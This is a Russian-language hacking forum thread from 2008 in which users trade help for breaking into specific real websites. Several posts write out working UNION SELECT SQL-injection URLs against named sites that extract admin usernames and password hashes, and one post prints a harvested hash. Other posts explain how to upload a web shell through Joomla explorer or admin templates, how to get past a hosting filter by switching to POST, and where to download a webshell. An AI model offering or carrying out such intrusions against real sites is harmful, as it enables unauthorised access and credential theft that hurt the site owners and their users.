Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Нашол уязв

    Просмотр запрещенных файлов

    Ссылка - http://***.com/<<<<<<<<<<<<
    Описание уязвимости : просмотр запрещенных файлов

    Уязвимость Apache позволяет злоумышленнику читать недоступные файлы, путем прибавления символа "<" к запросу этих файлов.

    Решение:

    Установите последнюю версию.
    http://www.apache.org/

    Ссылки:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017
    http://www.apacheweek.com/issues/03-01-24#security

    А как ее юзать не знаю :( подскажите к примеру как прочитать конфиг.пхп
     
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Всем прива!
    Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))
     
  3. SiemX

    SiemX New Member

    Joined:
    18 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Помогите заюзать скюль инекцию и вытащить пас админа
     
  4. SiemX

    SiemX New Member

    Joined:
    18 Aug 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    тему я создал, но там никто не помог
     
  5. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://release.master.dcms.su/info.php?id=1

    $id=intval($anket);

    имхо скулы нет, intval() - переводит в число без точки так что только числа а ими скулу не сделаешь)
     
    #3005 truelamer, 20 Aug 2008
    Last edited: 20 Aug 2008
  6. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Если ты суперадмин, то можешь залить шелл через joomla xplorer (в папку images можешь сразу лить, т.к. там права 777 стоят) и потом гуляй по директориям :)
     
  7. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Вопрос как моно воспользоваться вот этим?

    http://rk-triada.ru//d8cms/admin_themes/

    И где моно найти ифу про cms nextweb и её уязвимости ,,??

    Ивобще у этого сайта http://rk-triada.ru/ что нет уязвимости??? Лично я проверил вроде на все что знаю!

    (заранее спасибо)​
     
    #3007 geforce, 22 Aug 2008
    Last edited: 22 Aug 2008
  8. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    никак,просто права на диру не правильно стоят
     
  9. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Есть такой сайт http://www.modvlad.ru/

    зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/*

    но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    geforce
    вот так смотри все таблы..
    вот правельная база от форума..
    Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/
    осталось разшифровать.. и залить шелл через темплейты)
     
  11. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А вот деся как мне залить shell???

    http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+limit+4,1/*
     
    #3011 geforce, 22 Aug 2008
    Last edited: 22 Aug 2008
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    geforce
    если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )
     
    #3012 sabe, 22 Aug 2008
    Last edited: 22 Aug 2008
  13. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Что значи (по енг то shellcode) я новичёк вобщето? (=
     
    1 person likes this.
  14. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    wow.alania.net
    ну собсветнно для данного ресурса file_priv Нема то есть через скулю шелл не залить что не удивительно если пасс к админке лежит в базе попробуй его выташить и залить через админку )
    Шелл-код (код оболочки, англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.

    При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).
    взято из вики ;)
     
  15. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    если тебе для web уязвимости, то нужен webshell
    хороший от маднета http://madnet.name/files/1/10.html
     
  16. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Люди где моно найти ифу про cms nextweb и её уязвимости ,,??
     
  17. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    ttp://www.securitylab.ru/vulnerability/205726.php
     
  18. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    а вот это инекция http://rk-triada.ru/index.php?page=999??

    И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??
     
    #3018 geforce, 22 Aug 2008
    Last edited: 22 Aug 2008
  19. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Фильтрация, хороший сайт хорошая sql на нём) Но from фильтруется, Можно это кат-то обойти?

    Есть подозрение на хостинг.

    :D удалил
     
    #3019 tor4), 22 Aug 2008
    Last edited: 22 Aug 2008
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    tor4)
    Это спейс веб, фильтрует не from, а последовательность union+select+from, обходится POST'ом
     
    #3020 Kakoytoxaker, 22 Aug 2008
    Last edited: 22 Aug 2008
    1 person likes this.
Thread Status:
Not open for further replies.